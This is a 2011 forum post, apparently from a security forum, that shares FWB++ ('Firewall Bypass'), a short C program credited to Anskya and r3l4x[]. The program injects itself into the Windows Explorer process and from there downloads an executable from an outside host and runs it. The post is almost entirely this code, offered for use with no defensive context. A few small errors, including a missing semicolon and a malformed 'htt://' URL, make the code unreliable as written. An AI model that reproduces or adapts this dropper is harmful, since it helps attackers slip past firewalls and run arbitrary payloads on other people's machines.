Fwb++

Nytro · May 10, 2011

FWB++

FWB++ example by r3l4x[]

(FWB stands for Firewall Bypass)

/*
Coder:Anskya,r3l4x[]
*/
#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200")
#pragma comment(linker,"/OPT:NOWIN98  /BASE:0x13140000 /INCREMENTAL:NO") 
#pragma comment(linker,"/ENTRY:Entrypoint /MERGE:.rdata=.text /MERGE:.data=.text") 
#pragma comment(lib, "urlmon.lib")

#include <windows.h>

unsigned long inject (void *)
{
	URLDownloadToFile(0, "htt://Www.Anskya.Net/Test.exe", "C:\\xx.exe", 0, 0);
	WinExec("C:\\xx.exe", SW_SHOW);
	ExitThread(0);						
	return 0;
}

void Entrypoint()
{
	DWORD Size;  
	PBYTE module;
	HANDLE process;
	DWORD PID;
	LPVOID NewModule;

	module = (PBYTE)GetModuleHandle(0);
	Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;
	GetWindowThreadProcessId(FindWindow("shell_traywnd", NULL), &PID);
	process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	VirtualFreeEx(process, module, 0, MEM_RELEASE);		
	NewModule = VirtualAllocEx(process, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(process, NewModule, module, Size, NULL)
	CreateRemoteThread(process, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL);
}

Sursa: LeetCoders

Sign In

Fwb++

Recommended Posts

Nytro

Join the conversation

Browse

Activity

Pages